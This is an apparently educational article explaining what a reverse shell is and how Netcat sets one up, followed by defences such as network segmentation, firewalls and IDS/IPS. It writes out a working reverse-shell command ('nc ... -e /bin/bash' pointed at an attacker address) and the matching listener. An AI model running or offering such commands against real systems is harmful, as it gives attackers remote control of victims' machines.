When we browse the internet, we will need a port so that our computers can communicate. The port used depends on what protocol we use. For example, we use port 443 to communicate via the HTTPS protocol which is commonly used to access certain websites.
However, opening a port in our system is not a wise thing to do as this port can be a vulnerability so the attackers can enter our system. With a reverse shell, this condition is reversed, where the target will be given access to the attacker’s system through a port that was deliberately opened by the attacker.
What is a reverse shell?
Think about SSH which is more familiar to you. While you are accessing a remote PC or server, you can take full control over the PC you are connected to. Now imagine the target PC is now protected by a firewall and now rejecting any incoming traffic on port 22, which is a default port SSH. Certainly, you won’t be able to connect via SSH unless you change the firewall policy or change the port.
In spite of relying on this connection, what if we make the target PC connect to us instead? What if we let the script run on the target PC, so it will interact with our PC through a certain port? This is the basic idea of the reverse shell.
In simple words, reverse shell is a remote access where the target machine connects to the attacker machine. By doing this, connection can be established despite the target machine being protected behind the firewall.
What is Netcat?
Netcat is known as The Swiss-army knife of networking. It has the ability to create connections on any network setting either it is TCP or UDP. Besides, many features have been introduced as it develops, such as port scanning, DNS forward/reverse checking, remote administration and many more. In a client- server architecture, Netcat may work on both sides.
Client mode
In client mode, the Netcat is used to initiate connection between server and client. This is greatly beneficial for doing various tasks such as troubleshooting network issues or transferring files. Because this mode is responsible for starting the connection, it needs to define the ip address and the port used for the server
For example, the command below is used to create a connection to another machine with IP address 192.168.1.5 using port 123.
nc 192.168.1.5 123
Server mode
In server mode, Netcat will listen to a specific port on a remote machine. In this way, our PC can send or receive any data sent from the specific port. The machine with server mode will wait for incoming connections until it becomes available. Once it is made, it will then be able to interact with it through the terminal.
For example, the command below is used to listen on port 123.
nc -l 123
How does the attacker use Netcat for reverse shell?
At this point, you may already have an idea how it is done. The attacker may first deploy various techniques to let the target machine run the code such as social engineering, phishing attack, exploiting vulnerabilities, or using malware.
Let’s see from the attacker’s perspective.
Say that we are targeting Linux machines. Our machine and target are the
following.
| Device | IP address | Port |
|---|---|---|
| Attacker | 172.19.0.10 | 44 |
| Target | 172.19.0.11 | Randomly generated |
By default, Netcat is coming preinstalled in most Linux distributions. As we are doing reverse shell, we can set the client mode on the target machine and server mode on our machine.
For this example, we will use ncat command, which is a Netcat from the Nmap
Project. You can install it on your system with the command below.
sudo apt install ncat
The target machine needs to run the command below.
nc -nv 172.19.0.10 44 -e /bin/bash
For the target machine, we use several flags. We use -n (--nodns) so we
can define the IP address with the target port on our machine and -v for
verbose. -e means exec which will let our machine access the target using
bash.
Our machine will listen to port 44. To do that, we can use the command below.
nc -lnvp 44
We also use several flags for our side. -l means listen, so our machine can
actively bind and listen to the connection initiated by the target machine.
-p is the port we would like to open on our machine to establish connection.
The rest are the same as above.
If you’ve successfully established a connection, you may see something like this on your side.
Ncat: Listening on :::44
Ncat: Listening on 0.0.0.0:44
Ncat: Connection from 172.19.0.11.
Ncat: Connection from 172.19.0.11:35623.
After that, you can execute any shell command on the target machine.
How to defend against reverse shell attack?
There are several ways to defend your system against reverse shell.
Network segmentation
Segregating your network into smaller ones will be an effective solution in reverse shell attack. It is more likely for the attacker to target any sensitive data on a network. Doing network segmentation will greatly increase the difficulty for the attacker to be able to extract any sensitive data if the compromised system doesn’t share the same network.
For this particular case, you can try creating the virtual network or VLAN. Additionally, you can also set the public facing system on DMZ (Demilitarized Zone) while the more critical system (or database) is behind another firewall on the internal network.
Firewall
Both firewalls and Network ACL (Access Control Lists) will help in filtering unwanted connections. In case of reverse shell attack, rejecting the incoming traffic will not be effective. However, it will still be effective if the attacker IP address is known, so it can block the specific IP connection used by the attacker.
IPS and IDS
IDS (Intrusion Detection System) and IPS (Intrusion Prevention System) will work simultaneously for blocking any malicious traffic. IDS will continuously monitor your network traffic by identifying the patterns and anomalies. The IPS will then take an action in case of malicious traffic being detected and block it in real time. For most cases, many IDS will easily detect any simple reverse shell attempt.
Summary
A reverse shell is one thing you can do with Netcat. Considering that it is so easy to use, this type of attack may be preferred by attackers. As time progresses, reverse shell technique may improve significantly, allowing it to bypass any security measure the target might have implemented.